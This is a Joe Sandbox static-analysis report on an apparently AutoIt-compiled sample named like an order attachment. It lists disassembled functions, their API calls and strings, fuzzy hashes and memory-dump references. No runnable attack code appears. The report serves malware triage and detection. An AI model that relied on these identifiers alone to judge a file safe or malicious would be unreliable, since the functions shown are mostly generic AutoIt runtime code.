Instruction Fuzzy Hash: F8927E706083419FD714DF19C480BABB7E1BF84308F14885EE99A8B352D779ED85CB5A

Function 0040E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E959
timeGetTime.WINMM ref: 0040EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040ED2E
TranslateMessage.USER32(?), ref: 0040ED3F
DispatchMessageW.USER32(?), ref: 0040ED4A
LockWindowUpdate.USER32(00000000), ref: 0040ED79
DestroyWindow.USER32 ref: 0040ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040ED9F
Sleep.KERNEL32(0000000A), ref: 00475270
TranslateMessage.USER32(?), ref: 004759F7
DispatchMessageW.USER32(?), ref: 00475A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00475A19

Strings

@TRAY_ID, xrefs: 004754C9
@GUI_CTRLID, xrefs: 00475314
@GUI_CTRLHANDLE, xrefs: 004753AC
@GUI_WINHANDLE, xrefs: 00475360

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 3c99fcd718a6a9e912abb79b544e270a83b3c5c5f5871d70a6ff4634530d1678
Instruction ID: 30b0b18e468af62d7d02d398255fc33e35c629728c4d1f4c1ebb194875fc3dde
Opcode Fuzzy Hash: 3c99fcd718a6a9e912abb79b544e270a83b3c5c5f5871d70a6ff4634530d1678
Instruction Fuzzy Hash: AE62A370508340DFE724DF25C885BAA77E4BF44304F04497FE94A9B2D2DBB9A849CB5A

Function 00435C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00435EC3
___createFile.LIBCMT ref: 00435F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00435F2D
__dosmaperr.LIBCMT ref: 00435F34
GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00435F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00435F6A
__dosmaperr.LIBCMT ref: 00435F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00435F7C
__set_osfhnd.LIBCMT ref: 00435FAC
__lseeki64_nolock.LIBCMT ref: 00436016
__close_nolock.LIBCMT ref: 0043603C
__chsize_nolock.LIBCMT ref: 0043606C
__lseeki64_nolock.LIBCMT ref: 0043607E
__lseeki64_nolock.LIBCMT ref: 00436176
__lseeki64_nolock.LIBCMT ref: 0043618B
__close_nolock.LIBCMT ref: 004361EB

Part of subcall function 0042EA9C: CloseHandle.KERNEL32(00000000,004AEEF4,00000000,?,00436041,004AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0042EAEC
Part of subcall function 0042EA9C: GetLastError.KERNEL32(?,00436041,004AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0042EAF6
Part of subcall function 0042EA9C: __free_osfhnd.LIBCMT ref: 0042EB03
Part of subcall function 0042EA9C: __dosmaperr.LIBCMT ref: 0042EB25

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

__lseeki64_nolock.LIBCMT ref: 0043620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00436342
___createFile.LIBCMT ref: 00436361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0043636E
__dosmaperr.LIBCMT ref: 00436375
__free_osfhnd.LIBCMT ref: 00436395
__invoke_watson.LIBCMT ref: 004363C3
__wsopen_helper.LIBCMT ref: 004363DD

Strings

@, xrefs: 00435F98

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: 8c7789bed706ede18dd530b1e3ad8405d4c3b2db8187d7ab4351d5d6ff389688
Instruction ID: 258e66036f6fd46d17c8d5113c19e8d7647eaa250339654dbaeb5c90e1d5d4d5
Opcode Fuzzy Hash: 8c7789bed706ede18dd530b1e3ad8405d4c3b2db8187d7ab4351d5d6ff389688
Instruction Fuzzy Hash: 11224871A00506ABEF299F68DC46BAF7B71EB08314F25926BE9119B3D1C33D8D40C759

Function 0044FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0044FA96
_wcschr.LIBCMT ref: 0044FAA4
_wcscpy.LIBCMT ref: 0044FABB
_wcscat.LIBCMT ref: 0044FACA
_wcscat.LIBCMT ref: 0044FAE8
_wcscpy.LIBCMT ref: 0044FB09
__wsplitpath.LIBCMT ref: 0044FBE6
_wcscpy.LIBCMT ref: 0044FC0B
_wcscpy.LIBCMT ref: 0044FC1D
_wcscpy.LIBCMT ref: 0044FC32
_wcscat.LIBCMT ref: 0044FC47
_wcscat.LIBCMT ref: 0044FC59
_wcscat.LIBCMT ref: 0044FC6E

Part of subcall function 0044BFA4: _wcscmp.LIBCMT ref: 0044C03E
Part of subcall function 0044BFA4: __wsplitpath.LIBCMT ref: 0044C083
Part of subcall function 0044BFA4: _wcscpy.LIBCMT ref: 0044C096
Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0A9
Part of subcall function 0044BFA4: __wsplitpath.LIBCMT ref: 0044C0CE
Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0E4
Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0044FA61
t2K, xrefs: 0044FC97

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<$t2K
API String ID: 2955681530-1835454193
Opcode ID: 397c2a9de392346911fd9c790da9d7e7ae7aadc563be971c949fde63b22b24f3
Instruction ID: 503cd1224aee480db27c81d30548323e2f4b0e484ad6717af54db5903cf95967
Opcode Fuzzy Hash: 397c2a9de392346911fd9c790da9d7e7ae7aadc563be971c949fde63b22b24f3
Instruction Fuzzy Hash: 03919471604205AFDB10EF55D891E9BB3E8BF44314F00486FF98997292DB38F948CB9A

Function 00403F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403F86
RegisterClassExW.USER32(00000030), ref: 00403FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00403FC1
InitCommonControlsEx.COMCTL32(?), ref: 00403FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00403FEE
LoadIconW.USER32(000000A9), ref: 00404004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00404013

Strings

TaskbarCreated, xrefs: 00403FB6
+, xrefs: 00403F6F
AutoIt v3 GUI, xrefs: 00403FA2
0, xrefs: 00403F68

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8cbb75d3f7e5a3698af6f0d0412bdfe020db27ea78879be70f390616e49b9fa0
Instruction ID: 39fee9d6861713e640d73bccf1ba937979938cd6d36e5674434e574d06268e08
Opcode Fuzzy Hash: 8cbb75d3f7e5a3698af6f0d0412bdfe020db27ea78879be70f390616e49b9fa0
Instruction Fuzzy Hash: F12108B5D01308AFDB40EFA4EC89BCDBBB4FB09704F00452AF511A62A0D7B44544CF99

Function 0044BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0044BDB4: __time64.LIBCMT ref: 0044BDBE

Part of subcall function 00404517: _fseek.LIBCMT ref: 0040452F

__wsplitpath.LIBCMT ref: 0044C083

Part of subcall function 00421DFC: __wsplitpath_helper.LIBCMT ref: 00421E3C

_wcscpy.LIBCMT ref: 0044C096
_wcscat.LIBCMT ref: 0044C0A9
__wsplitpath.LIBCMT ref: 0044C0CE
_wcscat.LIBCMT ref: 0044C0E4
_wcscat.LIBCMT ref: 0044C0F7
_wcscmp.LIBCMT ref: 0044C03E

Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C65D
Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0044C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0044C338
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0044C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0044C35F
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0044C371

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 2d3f61bed0371d27bb488f48ba0a5d5d60d1fa0b6d7278b81cc3c75f8688b2c3
Instruction ID: 97f54707bf9dff136f04eda468cc35fa1287b7f90913d34c6e51530f47754c09
Opcode Fuzzy Hash: 2d3f61bed0371d27bb488f48ba0a5d5d60d1fa0b6d7278b81cc3c75f8688b2c3
Instruction Fuzzy Hash: ABC12CB1E01129ABDF21DF96CC81EDEB7BDAF48304F0440ABF609E6151DB749A448F69

Function 00BECE90 Relevance: 16.2, APIs: 10, Instructions: 1204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694228884.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 677c0d05586676826b450c97570aff8d1de6c0c0f806fb9bde639b64a97d2e82
Instruction ID: 08ae5fc46480180b5a4c528c4fa7588665f01e465ae8cf88d748c757b6ba79a6
Opcode Fuzzy Hash: 677c0d05586676826b450c97570aff8d1de6c0c0f806fb9bde639b64a97d2e82
Instruction Fuzzy Hash: 99A28D7190D3C08FC735CB1AC8447AABBE1EFD1318F098A9DE59897292D3B5AD058793

Function 00403742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004037B3
KillTimer.USER32(?,00000001), ref: 004037DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00403800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040380B
CreatePopupMenu.USER32 ref: 0040381F
PostQuitMessage.USER32(00000000), ref: 0040382E

Strings

TaskbarCreated, xrefs: 00403806

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 08d9edfe2973a40566a4fb3c1aa11a21c95826aed25fc90bcb733d729c5a2ec2
Instruction ID: 9818f98b5f829a4c8db2a31be09732de94f6fcc06798172ad55270a3605b7810
Opcode Fuzzy Hash: 08d9edfe2973a40566a4fb3c1aa11a21c95826aed25fc90bcb733d729c5a2ec2
Instruction Fuzzy Hash: D44115F5500149ABDB145F699C4AFBA3A59FB41302F00853BF902B32E2DB7C9D51972E

Function 00403E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403E79
LoadCursorW.USER32(00000000,00007F00), ref: 00403E88
LoadIconW.USER32(00000063), ref: 00403E9E
LoadIconW.USER32(000000A4), ref: 00403EB0
LoadIconW.USER32(000000A2), ref: 00403EC2

Part of subcall function 00404024: LoadImageW.USER32(00400000,00000063,00000001,00000010,00000010,00000000), ref: 00404048

RegisterClassExW.USER32(?), ref: 00403F30

Part of subcall function 00403F53: GetSysColorBrush.USER32(0000000F), ref: 00403F86
Part of subcall function 00403F53: RegisterClassExW.USER32(00000030), ref: 00403FB0
Part of subcall function 00403F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00403FC1
Part of subcall function 00403F53: InitCommonControlsEx.COMCTL32(?), ref: 00403FDE
Part of subcall function 00403F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00403FEE
Part of subcall function 00403F53: LoadIconW.USER32(000000A9), ref: 00404004
Part of subcall function 00403F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00404013

Strings

AutoIt v3, xrefs: 00403F1F
#, xrefs: 00403F09
0, xrefs: 00403F02

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 87d0efc2a200e611afc57662db2d9fe5074bb5fa0814b132d49e4943f5861427
Instruction ID: 6fc82eccf78ee3bbffcc202bd0bda0f016539c707d5aa7d19e764feb260bae21
Opcode Fuzzy Hash: 87d0efc2a200e611afc57662db2d9fe5074bb5fa0814b132d49e4943f5861427
Instruction Fuzzy Hash: E7212AB4D00304AFDB40DFAAEC45E99BFF5FB49314F14853AE214A22B2D77946508B99

Function 0042ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0042ACC1

Part of subcall function 00427CF4: __mtinitlocknum.LIBCMT ref: 00427D06
Part of subcall function 00427CF4: EnterCriticalSection.KERNEL32(00000000,?,00427ADD,0000000D), ref: 00427D1F

__calloc_crt.LIBCMT ref: 0042ACD2

Part of subcall function 00426986: __calloc_impl.LIBCMT ref: 00426995
Part of subcall function 00426986: Sleep.KERNEL32(00000000,000003BC,0041F507,?,0000000E), ref: 004269AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 0042ACED
GetStartupInfoW.KERNEL32(?,004B6E28,00000064,00425E91,004B6C70,00000014), ref: 0042AD46
__calloc_crt.LIBCMT ref: 0042AD91
GetFileType.KERNEL32(00000001), ref: 0042ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0042AE11

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 2c9eff342a85ee14410e3b23e10e55eeced261fa2f51718b9a05f3e09e174de4
Instruction ID: 1e7d97e7c38c6da714d1d657cfbdde346f06c9dd53f7923aedc6dd297c817baf
Opcode Fuzzy Hash: 2c9eff342a85ee14410e3b23e10e55eeced261fa2f51718b9a05f3e09e174de4
Instruction Fuzzy Hash: 23810A70A013618FCB14CF68D94059EBBF0AF05324B65426FD8A6AB3D1C73C9813CB5A

Function 00DF9E68 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00DF9EAD

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: a7ee1726a1e1b12efe43315ee36d34171cef466084f82628b941f28a8b69cf57
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 0B51E675A50208FBEF20DFA4CC59FEEB778AF48701F208554F74AEA184DA749A44DB60

Function 004049FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00404A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004741DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0047421A
RegCloseKey.ADVAPI32(?), ref: 00474249

Strings

Software\AutoIt v3\AutoIt, xrefs: 00404A13
Include, xrefs: 004741D3, 00474212

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 6e2642f92ac6b630ee04a3de7f9ccbad1b1158d06de569f2c8570250353f6bad
Instruction ID: 24367ca1c3048aa5880316b58277e600b20755b5d821188449d38961baa88e0d
Opcode Fuzzy Hash: 6e2642f92ac6b630ee04a3de7f9ccbad1b1158d06de569f2c8570250353f6bad
Instruction Fuzzy Hash: D6116071A01109BEEB04ABA4CD86EFF7BACEF45348F10446AB506E7191EB745E01DB58

Function 004036B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 004036E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403707
ShowWindow.USER32(00000000), ref: 0040371B
ShowWindow.USER32(00000000), ref: 00403724

Strings

AutoIt v3, xrefs: 004036DE, 004036E3, 004036E4
edit, xrefs: 00403701

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 5d8e0124634df2f6e3b1d57e41c7542da14dc5e0961a2e3f2bc33fd230573aeb
Instruction ID: 4d08d86da7aa94d300ca7f7225cc14ad318fbe6330d37f8c56b478b09d34b1b0
Opcode Fuzzy Hash: 5d8e0124634df2f6e3b1d57e41c7542da14dc5e0961a2e3f2bc33fd230573aeb
Instruction Fuzzy Hash: 57F0FE719402D07AEB715767AC48E773E7DEBC7F20F00403FBA04A25B1C66508A5DAB8

Function 00404A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C1148,?,004061FF,?,00000000,00000001,00000000), ref: 00405392

Part of subcall function 004049FB: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00404A1D

_wcscat.LIBCMT ref: 00472D80
_wcscat.LIBCMT ref: 00472DB5

Strings

\Include\, xrefs: 00404B0A
8!L, xrefs: 00404B1C
\, xrefs: 00472DA2

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
